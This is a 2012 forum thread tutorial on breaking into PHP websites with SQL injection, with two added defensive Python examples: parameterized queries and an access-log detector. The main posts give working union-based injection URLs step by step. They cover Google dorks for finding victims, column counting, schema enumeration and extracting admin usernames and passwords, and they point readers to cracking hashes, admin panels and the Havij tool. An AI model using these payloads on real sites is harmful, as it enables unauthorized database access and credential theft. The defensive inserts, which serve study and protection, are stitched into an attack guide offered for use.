HOW TO HACK PHP SITES USING SQL INJECTION
Views: 18688 | Comments: 326
Written: Oct 15, 2012



WARNING!!!
THIS TUTORIAL IS MEANT ONLY FOR THOSE WHO HAVE KNOWLEDGE OF ETHICAL HACKING AND FOR THOSE THAT ARE NEWLY STARTING. PLEASE DON'T MISUSE IT, BECAUSE I WOULDN'T BE RESPONSIBLE FOR ANY MISCONDUCT PERTAINING TO WHAT YOU'VE LEARNT HERE.
(HACKING IS MEANT FOR EDUCATIONAL PURPOSES ONLY)
LET'S GO THERE!

TOPICS TO TALK ABOUT

1. BRIEF EXPLANATION OF SQL, AND SOME BASIC QUERY COMMANDS ASSOCIATED WITH IT
2. FINDING VULNERABLE SITES USING DORKS
3. CHECKING FOR VULNERABILITY USING STRINGS
4. FINDING THE "NUMBER OF COLUMNS" IN THE WEBSITE'S DB
5. FINDING, DISPLAYING/EXPLOITING THE "VULNERABLE COLUMNS" IN THE DB
6. CHECKING THE DATABASE VERSION OF MYSQL
7. FINDING "TABLE NAMES" IN THE WEBSITE DB
8. FINDING COLUMN NAMES
9. DISPLAYING THE AVAILABLE USERNAMES, PASSWORDS, EMAILS etc. IN THE DATABASE
10. CRACKING OR DECRYPTING HASHES TO OBTAIN PASSWORDS (IF NECESSARY)

Tutorial Started!


=> "TUTORIAL 1"


Before we see what SQL Injection is, I think we should know what SQL and Database are.

=> Database:
A database is a collection of data. From a website's point of view, a database is used for storing user IDs, passwords, web page details and more.
Some databases are:

* DB servers,
* MySQL (open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* PostgreSQL (open source),
* SQLite,

=> SQL:
Structured Query Language (a type of database). In order to communicate with the database, we use SQL queries. We are querying the database, so it is called a query language.

=> Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name "SQL" is an abbreviation for Structured Query Language. For historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation "S.Q.L." is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called a relational database, and it is one of the world's leading database servers that web administrators use.
Simple basic queries for SQL:

1. SELECT, e.g. "SELECT * FROM table_name": this statement is used for showing the content of tables, including column names.
For example: SELECT * FROM users;

2. INSERT, e.g. "INSERT INTO table_name (column_names, ...) VALUES (corresponding values for columns)": for inserting data into a table.
For example: INSERT INTO users (username, userid) VALUES ("micheal", "greyfield");

I will give more detail and queries in my next thread about the OTHER SQL QUERIES LIKE "DELETE", "CONCAT" etc...
#1 SunnEX [1278] Oct 15, 2012
=> NOW, what is SQL Injection?

SQL injection is the most common and famous method of hacking at present. Using this method an unauthorized person (a cracker like you) can access the database of the website. The attacker can get all details from the database.

What can an attacker do?

* Bypassing logins
* Accessing secret data
* Modifying contents of the website
* Shutting down the MySQL server and lots of other damage

Precisely, SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

"LESSON TWO"

Finding Vulnerable Website:

Our best partner for SQL injection is Google. We can find the vulnerable websites (hackable websites) using a Google dork list. A Google dork is searching for vulnerable websites using the Google searching tricks. There are a lot of tricks for searching in Google, but we are going to use the "inurl:" command for finding the vulnerable websites.

Some examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork

... I'll continue soon, just let me know you are following.

Improving Waploaded Mobile Version To The Fullest
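
Added example, not part of the original thread: the definition in post #1 seen from the code a site owner has to fix, with the concatenated query beside a bound-parameter version. It is written in Python with sqlite3 standing in for the PHP/MySQL page the thread assumes; the table, data and function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data; sqlite3 stands in for the site's MySQL backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)", [(1, "Welcome"), (2, "News")])
    return db

def fetch_concatenated(db, raw_id):
    """Flawed pattern: the request parameter becomes part of the SQL text."""
    try:
        return db.execute("SELECT id, title FROM articles WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        # Echoing the driver error to the visitor is what confirms the flaw to them.
        return "SQL error: " + str(exc)

def fetch_parameterized(db, raw_id):
    """Hardened pattern: strict type check, then the value is bound, never parsed as SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # serve a generic not-found page and log the rejected value server-side
    return db.execute("SELECT id, title FROM articles WHERE id = ?", (int(raw_id),)).fetchall()

def compare(raw_id):
    """Run both versions against a fresh database and return (concatenated, parameterized)."""
    db = make_db()
    return fetch_concatenated(db, raw_id), fetch_parameterized(db, raw_id)

if __name__ == "__main__":
    # Input strings of the kind quoted in the thread, used here as test values.
    for value in ["2", "2'", "2 order by 2", "2 order by 3"]:
        print(repr(value), "->", compare(value))
```

Binding also covers the stored-string case in the definition: a value read back from a table is still passed as a parameter instead of being concatenated into the next statement.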
#2 Uc8mille [0] Oct 15, 2012
Yea proceed

We Love Waploaded.com With all Our Hearts
#3 geebehn [73] Oct 16, 2012
m wit u bro.

We Love Waploaded.com With all Our Hearts
#4 Passion [147] Oct 16, 2012
Ride on ma oga

We Love Waploaded.com With all Our Hearts
#5 netking [11] Oct 16, 2012
i feel yhew

We Love Waploaded.com With all Our Hearts
#6 dice629 [5] Oct 16, 2012
ride on we re wit u

We Love Waploaded.com With all Our Hearts
#7 matrosms [2] Oct 16, 2012
i am a spammer, i waz arrested by Israel32

We Love Waploaded.com With all Our Hearts
#8 Krishack [25] Oct 16, 2012
Good

this world is too small
#9 Krishack [25] Oct 16, 2012
Good

this world is too small
#10 Godwin5 [13] Oct 16, 2012
God bless u bro!

We Love Waploaded.com With all Our Hearts
#11 Murphy211 [3] Oct 16, 2012
Ride on

We Love Waploaded.com With all Our Hearts
#12 SunnEX [1278] Oct 16, 2012
Continuation:

view page 1 Here http://www.waploaded.com/tutorials/showtopic.php?currentpage=1&id=52

Here is the huge list of Google Dork

http://www.ziddu.com/download/13161874/A...t.zip.html

"LESSON 3"

*Checking the Vulnerability*

Now we should check the vulnerability of websites. In order to check the vulnerability, add the single quote (') at the end of the URL and hit enter. (No space between the number and the single quote.)

For example:
http://www.victimsite.com/index.php?id=2'

If the page remains on the same page, or shows page not found, or shows some other web pages, then it is not vulnerable.

BUT if it shows any errors related to the SQL query, then it is vulnerable. THAT'S THE CRACK!!!

For example, you might see an error message like this below:

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

If that happens, CONGRATULATIONS, WE HAVE SUCCESSFULLY PASSED STAGE 1

WORK IS OVER.......NOW COMES THE MAIN CRACKING! I HOPE YOU GET MY STEPS, IF NOT TELL ME NOW

*How to use*

Copy one of the above commands and paste it in the Google search engine box.

Hit enter.

You can get a list of websites. We have to visit the websites one by one for checking the vulnerability. So start from the first website.

Note: if you would like to hack a particular website, then try this:

site:www.victimsite.com dork_list_commands

For example:

site:www.victimsite.com inurl:index.php?id=


"LESSON 4"

*Finding Number of Columns in the Website's Database Table*

Now we have found the website is vulnerable. The next step is to find the number of columns in the table. For that, replace the single quote (') with the "order by n" statement. (Leave one space between the number and the order by n statement.) Change the n from 1,2,3,4,5,6,...n until you get an error like "unknown column".

For example:
http://www.victimsite.com/index.php?id=2 order by 1 => "no error message"
http://www.victimsite.com/index.php?id=2 order by 2 => "no error message"
http://www.victimsite.com/index.php?id=2 order by 3 => "no error message"
http://www.victimsite.com/index.php?id=2 order by 4 => "no error message"
Continue to change the number until you get the error "unknown column".

SO if you get the error while trying the "x"th number, then the number of columns is "x-1".

What I mean is this: let's say we continue incrementing the number accordingly to get the error column...

http://www.victimsite.com/index.php?id=2 order by 7 => "no error"
http://www.victimsite.com/index.php?id=2 order by 8 =>>> "ERROR MESSAGE"

So now x=8, THEREFORE the number of columns is x-1, i.e. 7.

Sometimes the above may not work. SO ADD "--" at the end of the statement.

For example:
http://www.victimsite.com/index.php?id=2 order by 1--

[Hope no misunderstanding yet?]

--

Continue by 8pm tomorrow.

Improving Waploaded Mobile Version To The Fullest
#13 kayouday [10] Oct 17, 2012
0ga sunnex ..u try sha

#14 SunnEX [1278] Oct 17, 2012
Note you can still put (/*) or (/--) at the end of the URL, as in
http://www.victimsite.com/index.php?id=2 order by 3/*
or
http://www.victimsite.com/index.php?id=2 order by 3/--

Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement, and change the id value to negative (I mean id=-2; must change, but on some websites it may work without changing).

Replace the columns_sequence with the numbers from 1 to x-1 (number of columns) separated with commas (,).

For example, if the number of columns is 7, then the query is as follows:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page (it must be less than the 'x' value, I mean less than or equal to the number of columns).
Like this:

Now select 1 number.
It is showing 3,7. Let's take the number 3.

Step 5: Finding version, database, user
Now replace the 3 in the query with "version()"

For example:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3, something like this.
Replace the version() with database() and user() for finding the database and user respectively.

For example:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working, then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Finding the Table Name: if the version is 5 or above, then follow these steps.
Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name)" and add the "from information_schema.tables where table_schema=database()"
For example:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Now it will show the list of table names. Find the table name which is related to the admin or user.

Now select the "admin" table. If the version is 4 or some others, you have to guess the table names (user, tbluser). It is hard and boring to do SQL injection with version 4.

Finding the Column Name
Now replace the "group_concat(table_name)" with the "group_concat(column_name)". Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--"

Now read carefully: we have to convert the table name to a MySQL CHAR() string and replace mysqlchar with that.
Find MysqlChar() for Tablename: First of all install the HackBar addon:

https://addons.mozilla.org/en-US/firefox/addon/3899/

Now select sql->Mysql->MysqlChar(). This will open the small window; enter the table name which you found. I am going to use the admin table name. Click ok.

Now you can see the CHAR(numbers separated with commas) in the Hack toolbar downloaded previously. Copy and paste the code at the end of the URL instead of the "mysqlchar"

For example: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97,100,109,105,110)--

Now it will show the list of columns, like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
Columnname should be replaced from the listed column names.
anothercolumnname should be replaced from the listed column names.

Now replace the "from information_schema.columns where table_name=CHAR(97,100,109,105,110)" with the "from table_name"

For example: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometimes it will show that the column is not found. Then try other column names.
Now it will bring usernames and passwords.
NOW if the website has members then Woopiee!! for you. You will have the list of usernames and passwords. Sometimes you may have the email IDs also. Enjoy, you got the duck which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with URLs like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.

If you have luck, you will find the admin page using the above URLs, or try this list.

Here is the list of admin URLs:

http://www.ziddu.com/download/13163866/A...t.zip.html

Tutorial completed!..

Improving Waploaded Mobile Version To The Fullest
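
Added example, not part of the original thread: the request sequence described in posts #12 and #14 (quote test, "order by n", "union select", information_schema lookups) leaves a recognisable trail in a web server's access log, and this sketch groups that trail by client. It assumes Apache combined-style log lines; the sample lines, stage names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Probing stages in the order the thread walks through them.
STAGES = [
    ("quote_probe", re.compile(r"^-?\d+'$")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
]
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

# Constructed access-log lines (documentation address ranges, no real hosts).
SAMPLE_LOG = """\
203.0.113.7 - - [16/Oct/2012:10:00:01 +0000] "GET /index.php?id=2' HTTP/1.1" 200 512
203.0.113.7 - - [16/Oct/2012:10:00:09 +0000] "GET /index.php?id=2%20order%20by%208-- HTTP/1.1" 200 530
203.0.113.7 - - [16/Oct/2012:10:00:30 +0000] "GET /index.php?id=-2%20union%20select%201,2,3,4,5,6,7-- HTTP/1.1" 200 2048
203.0.113.7 - - [16/Oct/2012:10:01:02 +0000] "GET /index.php?id=-2+and+1=2+union+select+1,2,group_concat(table_name),4,5,6,7+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 2301
198.51.100.20 - - [16/Oct/2012:10:02:00 +0000] "GET /index.php?id=2 HTTP/1.1" 200 4096
198.51.100.20 - - [16/Oct/2012:10:02:05 +0000] "GET /article.php?id=15&sort=order HTTP/1.1" 200 3811
"""

def stages_by_client(log_text):
    """Return {client_ip: [stage names in first-seen order]} for matching requests."""
    seen = {}
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl URL-decodes each value, so %20 and + both become spaces.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for stage, pattern in STAGES:
                if pattern.search(value) and stage not in seen.setdefault(ip, []):
                    seen[ip].append(stage)
    return seen

def flag_clients(log_text, min_stages=2):
    """Clients that hit at least min_stages distinct stages: candidates for review or blocking."""
    return sorted(ip for ip, st in stages_by_client(log_text).items() if len(st) >= min_stages)

if __name__ == "__main__":
    print(stages_by_client(SAMPLE_LOG))
    print(flag_clients(SAMPLE_LOG))
```

Requiring two or more distinct stages per client keeps a single stray quote in a URL from raising an alert while still catching the step-by-step progression.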
#15 Mbosinwa [15] Oct 20, 2012
Addition to step 8:
You can easily search for your victim cpanel by downloading a powerful sql injector tool.. HAVIJ

We Love Waploaded.com With all Our Hearts